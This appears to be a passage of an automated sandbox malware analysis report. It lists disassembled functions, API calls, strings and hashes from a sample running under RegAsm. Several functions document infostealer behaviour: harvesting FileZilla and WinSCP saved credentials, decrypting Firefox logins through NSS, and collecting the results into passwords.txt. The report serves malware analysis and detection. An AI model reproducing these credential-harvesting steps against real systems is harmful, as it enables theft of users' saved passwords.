                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C86FE98,?,?,?,?,?,6C80582D), ref: 6C83CC56
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC6C
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC82
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CC98
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C80582D), ref: 6C83CCAE
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C83CCC4
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C83CCDA
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C83CCEC
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C83CCFE
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C83CD14
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C83CD82
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C83CD98
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C83CDAE
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C83CDC4
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C83CDDA
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C83CDF0
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C83CE06
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C83CE1C
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C83CE32
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C83CE48
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C83CE5E
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C83CE74
                                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C83CE8A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                                  • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                                  • Opcode ID: 66855b923c29c1d169996c0e8542f6778eb37dd129df91c908475444e8d7270a
                                                                                                                                                                                                                                                                                                  • Instruction ID: bd20e17b1a009a2908f056818904487ef003b867dfa7bc79d218ba11bdee0271
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66855b923c29c1d169996c0e8542f6778eb37dd129df91c908475444e8d7270a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4551659190527911FE32319A6F10BAA3405EB5224BF107E3AF90DA6F83FF09D60985F7
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040C9F9 Relevance: 66.8, APIs: 28, Strings: 10, Instructions: 292stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CA06
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA48
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA90
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CAD8
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAE7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB73
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB8B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBA3
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBBB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Soft: FileZilla), ref: 0040CBD3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Host: ), ref: 0040CBE2
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CBF5
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F08), ref: 0040CC04
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC17
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F0C), ref: 0040CC26
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Login: ), ref: 0040CC35
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC48
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F18), ref: 0040CC57
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Password: ), ref: 0040CC66
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC79
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F28), ref: 0040CC88
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F2C), ref: 0040CC97
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040CCDB
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00418083,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCF1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CD42
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$mallocmemsetstrncpystrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$>kB;kB:kB$Host: $Login: $Password: $Soft: FileZilla$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 368316605-2269495603
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d9acf64c489632148de14d5d3a10a4811b9df8df843a2dcd006c96bbdbf6f3d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9fd3a2253dc7e466d053cb9de484b2d98c4ad2be0fb040733c1b5b0357f32ec9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d9acf64c489632148de14d5d3a10a4811b9df8df843a2dcd006c96bbdbf6f3d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FB19275900218AACB14EBE0DD56FEEBB79AF19304F50046EF511B3192DF786A08CB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00409360 Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 295stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • NSS_Init.NSS3(00000000,00000000,00000000,00000009,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 0040938E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409473
                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 0040947C
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 0040948B
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00409495
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00420838,00000000,?,?,?,?,?,?,?,00000000,00420838,000000FF), ref: 004094A8
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094B5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094BC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,01571F20,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094CD
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-00000010,01572160,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004094EB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F758), ref: 00409501
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409514
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C40), ref: 00409523
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409536
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C44), ref: 00409545
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F828), ref: 00409555
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,-00000010), ref: 00409560
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C48), ref: 0040956F
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE,01571B80,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409580
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014,01571B20,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409591
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,0156F7E8), ref: 004095A7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: memset.MSVCRT ref: 00409259
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: lstrlen.KERNEL32(004095B3,00000001,?,00001FA0,00000000,00000000,?,004095B3), ref: 00409276
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: CryptStringToBinaryA.CRYPT32(004095B3,00000000,?,004095B3), ref: 0040927E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_GetInternalKeySlot.NSS3(?,004095B3), ref: 0040928C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,004095B3), ref: 004092A1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004092D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: memcpy.MSVCRT ref: 004092F1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_FreeSlot.NSS3 ref: 0040930B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 004095BB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C4C), ref: 004095CA
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-000000FE,01571B20,?,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004095DB
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000014,0156F728,?,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004095EC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,01571FE0), ref: 00409602
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: lstrcat.KERNEL32(00426A96,00426A9A), ref: 0040932D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409230: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420838), ref: 00409334
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00000000), ref: 00409616
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C50), ref: 00409625
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(000000FF,00426C54), ref: 00409634
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(-00000002,01571F20,?,?,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409645
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 00409659
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004096AB
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004096B4
                                                                                                                                                                                                                                                                                                  • NSS_Shutdown.NSS3(?,?,?,?,?,?,00000000,00420838,000000FF,?,0040A809), ref: 004096BA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileK11_lstrcpy$Slotlstrlen$FreeHeapPointermemset$AllocAuthenticateBinaryCloseCryptDecryptHandleInitInternalProcessReadShutdownSizeStringmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 888326940-347816968
                                                                                                                                                                                                                                                                                                  • Opcode ID: c8d9d6e7c8489ba495897a24762163eeeb39d4a4ecc1c895c6ee1349d63147b4
                                                                                                                                                                                                                                                                                                  • Instruction ID: dfcf3cf3b5ff1e9ebf6a3d7c4469863c68c85a99f92adb76784daa1832cd8296
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8d9d6e7c8489ba495897a24762163eeeb39d4a4ecc1c895c6ee1349d63147b4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BB1D375900219ABD714EBE0DD49FAE7B7AEF19304F10052DFA11A32D1CB786905CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040C5C8 Relevance: 56.2, APIs: 22, Strings: 10, Instructions: 221stringregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,Soft: WinSCP), ref: 0040C5DC
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,Host: ), ref: 0040C5EB
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32("@,?,HostName,00000002,00000000,00000000,?), ref: 0040C60F
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C61C
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32("@,?,PortNumber,0000FFFF,00000000,00421170,?), ref: 0040C647
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C66D
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,:22), ref: 0040C689
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426E38), ref: 0040C698
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,Login: ), ref: 0040C6A7
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32("@,?,UserName,00000002,00000000,?,?), ref: 0040C6CB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0040C6D8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426E50), ref: 0040C6E7
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32("@,?,Password,00000002,00000000,?,?), ref: 0040C70B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,Password: ), ref: 0040C716
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426B2B), ref: 0040C728
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C763
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426E6C), ref: 0040C77D
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426E70), ref: 0040C78C
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32("@,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C7B1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B90: wsprintfA.USER32 ref: 00411BAB
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C7C2
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C7D0
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040C7E8
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C838
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Value$memset$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: "@$Host: $HostName$Login: $Password$Password: $PortNumber$Soft: WinSCP$UserName$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 2902345061-497330012
                                                                                                                                                                                                                                                                                                  • Opcode ID: 858a1d64256ae9d157926f7248f0df7de141649a4e03bad6bd564cf9e48e4a91
                                                                                                                                                                                                                                                                                                  • Instruction ID: 59e51b47cecfb799ce981244a0ee81322806ed085db7058d3b7b68affb90ec68
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 858a1d64256ae9d157926f7248f0df7de141649a4e03bad6bd564cf9e48e4a91
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E818DB5A0022DEBDB04DBE4CD85EFFB779EB48304F10455AF601A3181E6786E488BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C804470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C804730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C8044B2,6C87E21C,6C87F7F8), ref: 6C80473E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C804730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C80474A
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C8044BA
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C8044D2
                                                                                                                                                                                                                                                                                                  • InitOnceExecuteOnce.KERNEL32(6C87F80C,6C7FF240,?,?), ref: 6C80451A
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C80455C
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 6C804592
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(6C87F770), ref: 6C8045A2
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000008), ref: 6C8045AA
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000018), ref: 6C8045BB
                                                                                                                                                                                                                                                                                                  • InitOnceExecuteOnce.KERNEL32(6C87F818,6C7FF240,?,?), ref: 6C804612
                                                                                                                                                                                                                                                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C804636
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(user32.dll), ref: 6C804644
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C80466D
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C80469F
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8046AB
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8046B2
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8046B9
